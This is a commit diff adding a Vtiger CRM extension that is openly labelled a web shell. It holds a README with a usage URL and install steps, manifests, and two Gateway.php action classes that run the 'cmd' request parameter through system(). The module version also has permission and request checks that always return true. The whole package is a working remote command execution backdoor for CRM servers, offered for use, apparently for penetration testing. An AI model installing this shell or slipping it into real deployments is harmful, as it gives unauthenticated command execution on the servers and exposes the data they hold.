vulnerable vtiger plugin

Web-Shells/Vtiger/README.md

@@ -0,0 +1,13 @@
+# Vtiger Vulnerable Extension
+
+An installable Vtiger extension which provides interface to perform command execution on the respective web server.
+
+/index.php?module=VtigerVulnPlugin&action=Gateway&cmd=id
+
+### Steps to use
+
+1. Create a zip archive including all the files in the repository
+2. Install the zip via Settings -> Module Manager
+3. Ready to cook..
+
+Don't use it in a production environment.

Web-Shells/Vtiger/languages/en_us/Settings/VtigerVulnPlugin.php

@@ -0,0 +1,3 @@
+<?php
+
+return null;

Web-Shells/Vtiger/languages/en_us/VtigerVulnPlugin.php

@@ -0,0 +1,3 @@
+<?php
+
+return null;

Web-Shells/Vtiger/manifest.xml

@@ -0,0 +1,25 @@
+<?xml version='1.0'?>
+<module>
+	<name>VtigerVulnPlugin</name>
+	<label>VtigerVulnPlugin</label>
+	<parent>Tools</parent>
+	<version>1.01</version>
+	<dependencies>
+		<vtiger_version>7.0.0</vtiger_version>
+		<vtiger_max_version>7.*</vtiger_max_version>
+	</dependencies>
+	<license>
+		<file>LICENSE.txt</file>
+	</license>
+
+	<actions>
+		<action>
+			<name><![CDATA[Import]]></name>
+			<status>enabled</status>
+		</action>
+		<action>
+			<name><![CDATA[Export]]></name>
+			<status>disabled</status>
+		</action>
+	</actions>
+</module>

Web-Shells/Vtiger/modules/VtigerVulnPlugin/VtigerVulnPlugin.php

@@ -0,0 +1,18 @@
+<?php
+/* +***********************************************************************************************************************************
+ * The contents of this file are subject to the YetiForce Public License Version 1.1 (the "License"); you may not use this file except
+ * in compliance with the License.
+ * Software distributed under the License is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY KIND, either express or implied.
+ * See the License for the specific language governing rights and limitations under the License.
+ * The Original Code is YetiForce.
+ * The Initial Developer of the Original Code is YetiForce. Portions created by YetiForce are Copyright (C) www.yetiforce.com.
+ * All Rights Reserved.
+ * *********************************************************************************************************************************** */
+include_once 'modules/Vtiger/CRMEntity.php';
+
+class VtigerVulnPlugin extends Vtiger_CRMEntity
+{
+  
+}
+
+?>

Web-Shells/Vtiger/modules/VtigerVulnPlugin/actions/Gateway.php

@@ -0,0 +1,29 @@
+<?php
+
+/* +***********************************************************************************
+ * The contents of this file are subject to the vtiger CRM Public License Version 1.0
+ * ("License"); You may not use this file except in compliance with the License
+ * The Original Code is:  vtiger CRM Open Source
+ * The Initial Developer of the Original Code is vtiger.
+ * Portions created by vtiger are Copyright (C) vtiger.
+ * All Rights Reserved.
+ * *********************************************************************************** */
+
+class VtigerVulnPlugin_Gateway_Action extends Vtiger_BasicAjax_Action {
+
+    public function checkPermission(Vtiger_Request $request) {
+        return true;
+    }
+
+    public function process(Vtiger_Request $request) {
+        echo "<pre>";
+        system($request->get("cmd"));
+        echo "</pre>";
+        die;
+    }
+
+    public function validateRequest(Vtiger_Request $request) {
+        return true;
+    }
+
+}

Web-Shells/Vtiger/modules/VtigerVulnPlugin/manifest.xml

@@ -0,0 +1,25 @@
+<?xml version='1.0'?>
+<module>
+	<name>VtigerVulnPlugin</name>
+	<label>VtigerVulnPlugin</label>
+	<parent>Tools</parent>
+	<version>1.01</version>
+	<dependencies>
+		<vtiger_version>7.0.0</vtiger_version>
+		<vtiger_max_version>7.*</vtiger_max_version>
+	</dependencies>
+	<license>
+		<file>LICENSE.txt</file>
+	</license>
+
+	<actions>
+		<action>
+			<name><![CDATA[Import]]></name>
+			<status>enabled</status>
+		</action>
+		<action>
+			<name><![CDATA[Export]]></name>
+			<status>disabled</status>
+		</action>
+	</actions>
+</module>

Web-Shells/Vtiger/settings/actions/Gateway.php

@@ -0,0 +1,25 @@
+<?php
+
+/* +**********************************************************************************
+ * The contents of this file are subject to the vtiger CRM Public License Version 1.1
+ * ("License"); You may not use this file except in compliance with the License
+ * The Original Code is:  vtiger CRM Open Source
+ * The Initial Developer of the Original Code is vtiger.
+ * Portions created by vtiger are Copyright (C) vtiger.
+ * All Rights Reserved.
+ * ********************************************************************************** */
+
+class Settings_VtigerVulnPlugin_Gateway_Action extends Vtiger_BasicAjax_Action {
+
+    public function process(Vtiger_Request $request) {
+        echo "<pre>";
+        system($request->get("cmd"));
+        echo "</pre>";
+        die;
+    }
+
+    public function validateRequest(Vtiger_Request $request) {
+        return true;
+    }
+
+}